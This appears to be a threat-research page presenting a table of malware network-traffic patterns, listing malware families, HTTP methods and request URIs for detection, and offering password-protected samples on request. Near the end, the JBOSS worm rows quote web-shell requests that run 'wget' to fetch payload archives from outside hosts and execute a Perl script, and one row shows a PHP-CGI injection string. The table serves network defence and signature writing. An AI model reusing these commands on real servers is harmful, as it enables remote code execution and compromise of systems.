Use the new link below for a new interface and updates.
Traffic analysis has been the primary method of malware identification and thousands of IDS signatures developed are the daily proof. Signatures definitely help but ability to visually recognize malware traffic patterns has been always an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming and it is difficult to keep track of malware features if you don't have access to a well designed and constantly updated malware database. This started as "personal notes" spreadsheet with GET and POST requests for different malware families with information from open sources. We decided others might find it useful too.
Click on the column headers to see recent entries. Use other column headers to sort as needed. Wait a few seconds for the table to load from the Google Sheet. URI and User-Agent fields might have spaces for easier cell wrapping. Remove them if you export the data.
Yes, you can download samples mentioned in the spreadsheet. See the "dl" column in the full spreadsheet table and corresponding links to the download location. Use "Contagio" password scheme (email Mila or admin at deependresearch.org)
Image credit: Jay Walker Library. Src.Vancouversun
VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS"
List of malware families and available downloads for their samples, pcaps (click on the link above for the full post)
type | family | method | uri |
CRIME | Carberb / /Glupteba | GET | /get_ads.php?yy=1&aid=2&atr=exts&src=199 /go/p1011105.subexts /go/page/landing_page_68?nid=14&layout=qna&pid= p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1 /javascript/live_cd/popunder_script-1400195675.js /images/ffadult/css/header.css /css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css |
CRIME | Fiesta EK | GET | /?_SPMq=vahK1gfvq3&z1_Aj =fW8sL8ld&nkPgy= 81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf= fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86 __=He0S4m9G &QPy3i=J4HP58S7h&dRPS8=7bi7Y /?3W_wN=I40_W5_&eht =t8vP8M8L&2ad_uO= 33KPa&_s3oi=8P5_7&QLfo= cHai8w&ZM7P_K=bSG7TH3p&UKb38= 1s4wx2s&jSJyB=cM7c /?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR /?_I4XS=idKbueq4kR1q8&0TsZ= Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty= x21dbrs8y5 /?m_FxE=eh0&MkFq=H8GeS&fz7= 1l3&d2T6r=ae&LeH_9= k0Il2W&Z7i6=3S1&7h_ =Sdlc&zmGAU=i0uf&mMwf=ehp5p& ymV7T=y7lKe&Jpk_DF=_5_2 |
CRIME | Fiesta EK | GET | /yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9 /ai_qkvu2/4a374fcc5b4966050058040c015d5253005 2030f0f5201530f54070e0507525450;118800;94 /ai_qkvu2/074f70a95a1651de5952585d020b5009040 4045e0c0403090b02005f0651500e54 |
CRIME | Gongdad / Gong Da compromised site redirects | GET | /pg/kcp/index.html /popup/index.html /my/by4.html |
CRIME | Gongdad / Gong Da EK | GET | /data/file/cr/index.html /data/file/cr/swfobject.js /data/file/cr/jquery-1.4.2.min.js /data/file/cr/main.html /data/file/cr/AyVpSf.jar /data/file/cr/com.class /data/file/cr/edu.class /data/file/cr/net.class /data/file/cr/org.class /windos.exe |
CRIME | Dalexis Loader | GET | /tmp/pack.tar.gz /assets/pack.tar.gz /piwigotest/pack.tar.gz /histoiredesarts/pack.tar.gz /fit/pack.tar.gz |
APT | Gholee / Rocket Kitten | GET / POST | /index.php?c=Ud7atknq&r=17117d /index.php?c=Ud7atknq&r=1710b2 |
CRIME | Zemot | GET | /b/shoe |
CRIME | Zemot DL via Asprox | GET | /catalog/159 |
CRIME | Zemot downloading Rovnix | GET | /mod_jshopping_products_gdle/mod_smartslider2/ |
CRIME | Zemot downloading Rerdom | GET | /mod_jshoppi/soft32.dl |
CRIME | Rerdom | GET | /b/eve/ |
CRIME | Clickfraud | GET | /b/req/ |
CRIME | Cidox / Rerdom / Clickfraud | GET | /b/eve/e91425775cc5d7e657bd2cc7 /b/letr/21D84379F768D95442B92BC5 /b/opt/E1805AD5D79824076249D696 /b/req/FDD953BA382388758DF27AE4 /b/pkg/ |
CRIME | Cidox / Rerdom / Clickfraud - clickurl GET | GET | /x/48petqwk9/ |
CRIME | Cidox / Rerdom / Clickfraud - clickurl GET | GET | /2014/06/26/new-game-tech-behind-scenes-sony -playstation with referrer http://controller-best.com |
APT / CRIME | Scieron / Httneilc / HTClient | packet data 0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82 0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38 0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04 0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13 0040 00 12 00 63 01 00 | |
CRIME | Zollard RFI | POST | /cgi-bin/php? %2D%64+%... |
CRIME | Upatre | GET | /js/jquery-1.41.15.js /js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a =1846&kZuJV1OyPrXdK0= 1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js /js/jquery-1.41.15.js?get_message=3290013886 |
CRIME | Cryptowall 3.0 | POST | http://proxy1-1-1.i2p/fee4roy2hih9 http://payto4gtpn5czl2.torforall.com/ofs20c |
CRIME | Andromeda | POST | /ldr.php |
CRIME | Angler EK Chain | GET | /t19jl0hvv2.php |
CRIME | Angler EK Chain | GET | /752s2n0ndw.php |
CRIME | Angler EK Chain | GET | /erL0pIvz9_wyAlk2koy7L4b2qScYutODp2Cm dYZyW hw1bW9lGM8EDW8cKKjx47cp |
CRIME | Angler EK Chain | GET | /P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy 48WScNKA 9m2DKeiJNTp7gSxYSPcXsN |
CRIME | Angler EK Chain | GET | /models/runway/ring/header.js |
CRIME | Angler EK Chain | GET | /code/decrease/revenue/core.js |
CRIME | Asprox / Kuluoz | GET | /include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak= HTTPS over port 443 as a possible connectivity check |
CRIME | Asprox / Kuluoz | POST | /index.php |
CRIME | Chanitor | POST | /gate.php |
CRIME | Chanitor Downloads | GET | /wp-includes/js/tinymce/plugins/wpfullscreen/1.php /wp-includes/js/tinymce/skins/lightgray/1.php /wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php /wp-includes/js/tinymce/plugins/wpfullscreen/1.php |
CRIME | Cryptowall | POST | /532boskc3i0 /nvebi4m4ggdokz /wbkljtzpimbryt |
CRIME | Cryptowall | GET | /wp-content/themes/exiportal/dh5x3a1815j /wp-content/themes/esther/6l7de |
CRIME | Dridex payload | GET | /mopsi/popsi.php /js/bin.exe |
CRIME | Fake AV post compromise | GET | /?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn |
CRIME | Fiesta EK | GET | /txf9p_v8/ye1PlchZ7X9pFcl0o-y3 /txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287 /txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406 |
CRIME | Flashpack EK | GET | /sv62a76d18537/index.php |
CRIME | GameThief | POST | /tj.asp |
CRIME | GameThief | GET | /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack |
CRIME | Gypothy | GET | /bigbight/kinkong.txt |
CRIME | H-W0rm | POST | /SpCoderHere |
CRIME | KaiXin EK | GET | /indexindex/ /indexindex/gg.jpg /indexindex/jquery-1.4.2.min.js /indexindex/swfobject.js /indexindex/main.html /xzz1.exe /indexindex/NlNwQh.jar /indexindex/com.class /indexindex/edu.class /indexindex/net.class /indexindex/org.class |
CRIME | Kovter | POST | /9/form.php /11/form.php /w1/form.php /1/feed.php |
CRIME | Nuclear EK | GET / POST | /XhBWV0gBT08OVFVW.html /AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA /ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j |
CRIME | Poweliks | GET | /query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 /query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 /query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 /query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 |
CRIME | Redirect to Fiesta EK | GET | /?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO & m_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3 |
CRIME | Sweet Orange EK | GET | /admin4_account/mobile/movies.php?timeline=18 /bad/generic/help.php?state=39 /cnet/tmp/Indy_admin/investor.php?setup=20 /dbadmin/wp-admin/hex/help.php?state=33 /forums/example/screens/investor.php?setup=20 /gcc/tmp/bad/help.php?state=25 /ip/ch/investor.php?setup=20 /profiles/stat/movies.php?timeline=21 |
CRIME | Sweet Orange EK | GET | /printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064 /printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair /printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix /store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249 /teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535 /teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil /teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954 /serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315 |
CRIME | TBD | POST | /store/ |
CRIME | TBD Post Flashpack | GET | /r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ /search?q=wrestling&subid=4699 /click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ |
CRIME | TBD Proxy (Htbot?) | GET | /ocfg.php?command=getip /ocfg.php?command=getid /ocfg.php?command=ghl&id=1493496 /ocfg.php?command=dl&id=1493496 /ocfg.php?command=version&id=1493496 /ocfg.php?command=getbackconnect /pointer.php?proxy= |
CRIME | Upatre | GET | /1501us22/ /1501us22/ /2807cw/ /2807cw/ /2807cw/ /1201uk1/ /1201uk1/ /1201uk1/ /2307stat/ /2307stat/ /2307stat/ |
CRIME | Vavtrak / Neverquest | POST | /collection/0000004E/00/9EBD6132 |
CRIME | Zeus | GET | /backup/config.bin /en/images/config.bin /guardnow/config.bin /guardnow/config.bin |
CRIME | Zeus | POST | /choosen/helps/file.php |
CRIME | AdWare Kraddare.IL | GET | /bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP... |
CRIME | AdWare Kraddare.IL | POST | /bv/config.php |
CRIME | Dyre | GET | /2001uk11/HOME/1/0/0/ |
CRIME | Dyre | GET | /mandoc/eula012.pdf |
CRIME | Dyre | GET | /mandoc/ml1from1.tar |
CRIME | Dyre plugin dl | GET | /ineede900.rar |
CRIME | Kazy | GET | /cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR |
CRIME | Mudrop | GET | /gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c= |
CRIME | ChePro (Brazil.banker) | GET | /ini/xvwmmwb.mod |
CRIME | Cryptolocker | POST | /home/ |
CRIME | Reedum | 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] | |
APT | Vidgrab | POST | (172.16.253.130)|1067|WinXP|D|L|No| 0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|. |
APT | Page / stscout / Elise / lStudio / Wumins | GET | /29af9cdc/page_12082223.html |
CRIME | Tijcont | GET | /s/blog_b2afd7fe01019tkf.htm |
APT | Darkcomet | GET | /a.php?id=c2ViYWxpQGxpYmVyby5pdA== |
CRIME | Kelihos | GET | /index.htm |
CRIME | Kuluoz Run command from C2 | n | c=run&u=/get/7d2c37d2070e1b38 6070db8c851dae08.exe&crc= 9e2b9c4f465 b765fc971423935c4b68e |
APT | njRAT / Backdoor.LV | lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'| Examiner|'|'|2013-06-21|'|'|USA|'|'| Win XP ProfessionalSP2 ... 171.ll|'|'|Li4uLi4uLk5FVy4uLi4u Li4uX0F FNTJDMzdE|'|'|SENTA|'|'| sentai55|'|'|15-01-29|'|'||'|'| Win 8.1SP0 x64|'|'|Yes|'|'|0.7d| '|'|..|'|'||'|'|b88ece4c04f706 c9717bbe6fb da49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uL i4uLi4uDQpyZWVlZWVk LmR5bmRucy5iaXo6M jUyNTQNCkFwcERhdGENCldpbnJhci5leG UNClRydWUNCkZhbHNlDQpU cnVlDQpGYWxzZQ==0. 251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJD MzdE|'|'|SENTA|'|'|sentai55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd 2VsbCB2LiBIb2JieSBMb2JieSBBYnJpZGdlZCBbQ29tcGF0aWJpbGl0eSBNb 2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2, lv|'|'|VHJvamFuX0M0NkY2RTk= |'|'|MARK|'|'|user |'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof] | |
CRIME | Chimerka.1 / Refyes.A | POST | /sys.php |
CRIME | Sality | GET | /images/logos.gif?1f5428=8212640 |
CRIME | Nitedrem | GET | /down.asp?action=install&u=cpmcpm&p= 2366A64BAA384EA6AB9CEF73E8E2BE12&t =7393 |
CRIME | Nitedrem | GET | /upx/kod.txt?k=123&t=7215 |
CRIME | Nitedrem | GET | ...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:............... |
CRIME | Nitedrem | GET | /config.txt?&t=4593 |
CRIME | Nitedrem | GET | /fish.jpg?&t=4426 |
CRIME | Sality | GET | /?12da89=12355930 |
CRIME | Sality | GET | /images/logos.gif?114bbc=9068000 |
CRIME | Sality | GET | /setting.doc |
CRIME | Torpig /Sinowal miniloader | GET | / |
CRIME | Torpig /Sinowal miniloader | GET | /search2?fr=altavista&itag=ody&q= b88d6ce7e9fe419788716298cc747adc %2C93a5d8146fea0bbb&kgs=1&kls=0 |
CRIME | EK Popads | GET | /?7d456d68729292e9843cb9dde2d2f7b4=34 |
CRIME | EK Popads | GET | /4d23ccceb2cf9e6c1c91df06170259d3/32cd ad27bdec4a68d8efc9bb835008e6.swf |
CRIME | EK Popads | GET | /855feed4acbb99c63ad7f25fef289284/decaff5b6ee 641742f53d8ef8c6f9a16.jar |
CRIME | EK Popads | GET | /?c480cfaa684e1dc0db1b2e1f891d814a= a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in |
CRIME | EK Popads | GET | /39ff9ff8c3b603d8eed017df64dd2799.eot |
CRIME | Alina POS v5.6 | POST | /duck/push.php |
CRIME | Alina POS v5.6 | POST | /adobe/version_check.php |
CRIME | Alina POS v6.0 | POST | /adobe/version_check.php |
APT (IN) | Hanove / Tourist | POST | /kamp.php |
APT | Surtr 2nd Stage DL | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ | |
APT | Surtr 2nd Stage DL | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ | |
APT | Surtr Initial GET | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ | |
APT | Taleret | GET | / |
APT | Taleret | GET | /jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU- |
CRIME | Sweet Orange EK | GET | /in.php?q=WPOChVXlw9QiOTwtCbg+ uSk36elyOCiUwI99U0PYxA== |
CRIME | ArcomRat / Dokstormac | POST | S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^] username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption [!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^] |
CRIME | Ardamax keylogger | SMTP | 220 smtp.mail.yahoo.com ESMTP ready EHLO DELLXT 250-smtp.mail.yahoo.com |
CRIME | Matsnu - MBR wiping ransomware | POST | /f44/myse.php |
CRIME | Mutopy Downloader | GET | /d/conh11.jpg |
CRIME | Mutopy Downloader initial callback | GET | /protocol.php?p=3894120584&d=4fQm27CpL9m6oC7 QvLZomrXyeYvptmyetaVE2deiLdi4 |
CRIME | Symmi Remote File Injector | GET | /img/seek.cgi?lin=100&db=dfs /ae1.php /ggu.php /wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies |
CRIME | Matsnu - MBR wiping ransomware | GET | /inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458 &stat=0&ver=2000803&loc=0x0409&os=Windows%20XP |
CRIME | Adware Hotbar | POST | /vic.aspx?ver=4.0.1158.0&rnd=595937 |
CRIME | Blackhole v2 | GET | /7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2 w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a= 1f&zg=c&tn=g&jopa=1658622 |
CRIME | USteal.D | 220---------- Welcome to Pure-FTPd ---------- | |
APT | Hangover Smackdown Minapro | GET | /flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts= [PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2 |
CRIME | Cutwail / Pushdo | POST | /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe |
APT | Mediana Proxy | GET | /index.htm?n763t4OPmrs6fXq7fXp7uj16e-r&Length=0 |
CRIME | Zeus | POST | /orders2010.php /busted.php |
CRIME | Gypthoy | POST | /opt/mainpage.php |
APT | Hupigon / Graybird | ........................................;... Windows XP 5.1 (2600.Service Pack 3).......................... ......................................$...DELLXT.................................... .................................... ........................................... 4s.love.......HACK.. | |
APT | Variant Letsgo / TabMsgSQL downloader (comment crew) | GET | /index.htm |
APT | Tapaoux | GET | /ol/yahoo/banner4.php?jpg=../yahoo |
CRIME | Horst Proxy | GET | /socks/proxy.php?ip=172.16.253.129&port= 41080&os=XP&iso=USA&smtp=0 |
CRIME | PassAlert | GET | /loader/bin/file1.exe |
CRIME | Bitcoinminer | POST | / |
CRIME | Karagany Loader | GET | /user/go.php?html=do |
APT | Gh0st | Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1 | |
APT | IXESHE | GET | /AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9j OKyjnxKjQJA x_bigfix_client_string: baQMyZrdqDAA |
APT2 | KoreanBanker DL | GET | /web/down/kbs.exe |
APT | Plugx | SSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO4 6Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png | |
CRIME | PowerLoader | POST | /postnuke/blog.php |
APT | RssFeeder (moved from TBD tab, common name still unknown) 2nd stage | POST | /orange/news.php |
APT | RssFeeder (moved from TBD tab, common name still unknown) initialGET | POST | /data/rss |
APT | Swami | GET | /im/linux.php |
CRIME | GameThief | GET | /xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4 D468A2&os=winxp%20 Professional&avs=unknow&ps=NO.&ver=0005&pnum=16 |
CRIME | Beebone downloader | GET | /0/?f|-1813912965Admin /a/76876332/1 |
CRIME | Neutrino EK var | POST | /cxiqocvbqd |
APT | Comfoo / Vinself / Mspub | POST | /BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/ 12AzAONjkCYw/UD1aND43a0xiWQ161/ |
APT | Destory Rat / Sogu / Thoper | POST | /update?id=000f72b8 |
APT2 | Disttrack / Shamoon | GET | /ajax_modal/modal/data.asp?mydata=AA== &uid=aaa.bbb.ccc.ddd&state=3067203 |
CRIME | Avatar Rootkit | GET | /search?query=EZTFDHWP&sort=relevance http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance |
APT | 9002 | POST | 9002..................wx....9002..................wx....9002....................... |
APT | MSWab /Yayih | POST | /bbs/info.asp |
CRIME | ZeroAccess / Sirefef | GET | /stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25 /count.php?page=952000&style=LED_g&nbdigits=9 |
CRIME | ZeroAccess / Sirefef ppc fraud - redirect | GET | HTTP/1.1 302 Moved Temporarily |
APT | 9002 | POST | /2d |
CRIME | Asprox / Kuluoz gets list of C2s | GET | /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0 |
CRIME | Asprox / Kuluoz Checkin | GET | /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35C70A97FF61249661F38426DA71D12B40F9A512B 6C945CD85462CD565962B6C5CACB1B09F86B1651 EB971F3013D14695028FE0BEBD838B9D3C5DE002 EA95371E51B0E8CFB7567F6BF |
CRIME | Asprox / Kuluoz GETs spam template | GET | /78dc91f1D56B9COC18B818A7A2B272F43O3A621C AEOC17O479E4E9A69B82 |
CRIME | Carberb | POST | /kmqkcicalxrntrngwdxjyxztxcqkoyjn bdoafqirgnwwvpcjqglucovna.htm |
CRIME | FakeAV var (via Kuluoz - Asprox botnet) | GET | /AFC392A9570E45C188F468429F6349E82ABF530D 32184946F872BB899FAECD808398A1630AEB78FE6EE44AB3 34A67A0A45B4ED8A690330E832085902F0146216 16CEB4AF702F4E5B37A9F53B21242F |
APT | Favorites | GET | /download731106?h1= FIFEFDAHAPGDENCMFOFFFCAGAE |
APT | Favorites | GET | /search?qu= |
APT | Favorites | GET | /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEF DAHAPGDENCMFOFFFCAGAE |
APT | Favorites | GET | /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE |
APT | Favorites | POST | /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH |
APT | Favorites | POST | /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE |
APT | Gh0st | GET | /cgi/online.asp?hostname= [COMPUTERNAME]&httptype=[1][not%20httptunnel] |
APT | Gh0st var | GET | /h.gif?pid =113&v=130586214568 HTTP/ 1. 1 |
CRIME | Guntior - CN bootkit | GET | /yx/tongji.html |
CRIME | Kuluoz.B downloader | GET | /index.php?r=gate&fq=acc0e9de&group=sl15&debug=0 |
CRIME | Ranbyus / Triton (Spy, Banking, smart cards) | POST | /releases/index.php |
CRIME | Urausy (Ransomware) | GET | /ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php |
APT | Glasses | GET | /ewpindex.htm |
APT | IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRAT | POST | /index000000001.asp |
APT | LURK | GET | LURK0........x.kf.e.apgpbpa0c..#........ |
APT | DNSWatch / Protux | GET | /dns/dnslookup?la=en&host=picture.ucparlnet. com&type=A&submit=Resolve |
APT | DNSWatch / Protux | GET | /news.jpg |
APT | DNSWatch / Protux | POST | /PHqgHumeay5705.mp3 |
CRIME | Andromeda | POST | /new/gate.php |
CRIME | Citadel | POST | /g.php |
CRIME | Citadel (Zbot var) | POST | /C270suqdh/file.php |
CRIME | Pony loader | POST | /ponyb/gate.php HTTP/1.0 |
CRIME | Reedum | GET | 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] |
APT | APT1 WEBC2_RAVE | GET | /comp/sem/resources.htm |
APT | backdoor ? | GET | /18110123/page_32262 308.html |
APT | Banechant 1 | GET | /IGKKT |
APT | Banechant payload dl 2 | GET | /adserv/logo.jpg HTTP /1.1 |
APT | Beebus | GET | /windosdate/v6/default.aspx?ln=en-us |
APT | Beebus C2 checkin | GET | /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZge NAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 |
APT | Beebus C2 checkin | GET | /s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8d ZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 |
APT | Beebus data send | POST | /s/asp?__ uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VwBJAE4ARABPAFcAUwBNAEEAQQBOAEU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA==p=2 |
CRIME EK | Blackhole 2 | GET | /fded177fe12651bb038f3f11b01c4168/q.php |
APT | Cookies /Cookiebag / Dalbot | GET | /1799.asp |
APT | Cookies /Cookiebag / Dalbot | GET | /3961.html Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtle T0zOTU0 O2hvc3RuYW1lPXZpY3RpbTs= |
APT | Cookies /Cookiebag / Dalbot | GET | /8223.asp (also can be like /2007.asp,/2013.asp etc |
APT | Cookies /Cookiebag / Dalbot | GET | /indexs.zip |
APT | Coswid | GET | /old/google.png |
APT | CVE-2012-0754 SWF in DOC | GET | /test.mp4 |
APT | CVE-2012-0779 | GET | /essais.swf?info=789c333230d13331d53337d63 3b3b432313106001afa0338&infosize=00FC0000 |
CRIME | Darkmegi | GET | /20111230.jpg |
CRIME | Darkness DDos v8g | GET | /index.php?uid=587609&ver=8g%20XP |
APT | Depyot | GET | /new/3d/d/pdf.php?id=2 |
APT | Destory Rat / Sogu / Thoper | POST | /update?id=000f6b50 |
APT | Destory Rat / Sogu / Thoper | POST | /update?id=3109c2a2 |
APT | Destory Rat / Sogu / Thoper | POST | /update?product=windows |
CRIME | DirtJumper DDoS | POST | /678/index.php |
CRIME | Dirtjumper ddos | POST | /boi854tr4w.php |
CRIME | DNSChanger | POST | /d56sc1d56scd56sc1.php?ini= v22Mmjy0SYXyWTI0tQ0QQOdqOb68 J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV75 0QegiB MF4XAHPzbYqRtufQpaX/M/trvO7ukg== |
APT | Downloader BMP | GET | /images/evil.bmp |
APT | Einstein | GET | /gttfi.php?id=019451425260376469&ext =YmFkc3R1ZmYuZGxs |
APT | Einstein data send | POST | /gttfi.php?id=019451425260376469& ext=ixioJXXJFCRrrDatKHhK |
CRIME EK | EK - Blackhole 2 landing | GET | /news/default-php-version.php?mdm=30:1g:2v:1f:1o& xguc= 3b:3i:39: 35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd |
CRIME EK | EK Blackhole 1 | GET | /showthread.php?t=d7ad916d1c0396ff |
CRIME EK | EK Phoenix | GET | /navigator/jueoaritjuir.php |
APT | Enfal / Lurid | GET | /oi2c/wlc3/ [reducted]:00-00-00-00-00-00/ij83d |
APT | Enfal / Lurid | GET | /trandocs/nm/.[reducted] :00-00-00-00-00-00lCrrrwhite |
APT | Enfal / Lurid | POST | /cgi-bin/CMS_SubitAll.cgi |
APT | Enfal / Lurid | POST | /cgl-bin/Owpq4.cgi |
APT | Enfal / Lurid | POST | /Sjwpc/odw3ux |
CRIME | Flashback OSX | GET | /statistics.html |
APT | Foxy | POST | /404error.asp |
APT | Foxy Checkin | GET | /images/leftnav_prog_bg.jpg |
APT | Gh0st ASP ver | GET | /1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr....)IL{..&y192.168.0.69 |
APT | Gh0st PHP ver | GET | /ld/queenfun/vl /login.php?cd2hpdGU&uU11T VEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l |
APT | Gh0st v2000 var | n | v2010........f...............( ......Service Pack 2..?..|...|...|0.@.. |
APT | GoogleAdC2 | GET | /html/lost.html |
APT | GoogleAdC2 2nd stage | GET | /Trojan2.jpg |
APT | Googles | GET | /sll/monica.jpg |
APT | Greencat | GET | / |
APT | Gtalk | GET | /facebook.png |
Hacktivism | HOIC DDoS | GET | / HTTP/1.0 |
CRIME | Imaut | GET | /setting.doc |
CRIME | IRCbot | GET | /check_ver.php?version=1.09 |
APT | IXESHE | GET | /AWS26329.jsp? UrFvwIJIOKTRyfxR9KNRqhg8lcPr/ CGjUwP8y JUs7RjH7OinJ/85cgrqiP8jKGjpqgb/ wTrO7OIjhxoHcGaFa URqK/aHophHLd23K=NHk= a9oQ hvDQaLky8qo/RnJz42A |
APT | IXESHE AES | GET | /AES210001 129016878.jsp?UrFwUIO3h7ofgw QInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk= +LLQhpkZ9LOhGbgqvJghHci7M |
CRIME | JBOSS worm | GET | /zecmd/zecmd.jsp?comment=perl+lindb.pl |
CRIME | JBOSS worm | GET | /idssvc/idssvc.jsp?comment= wget+http://webstats.dyndns.info/javadd.tar.gz |
CRIME | JBOSS worm | GET | /iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz |
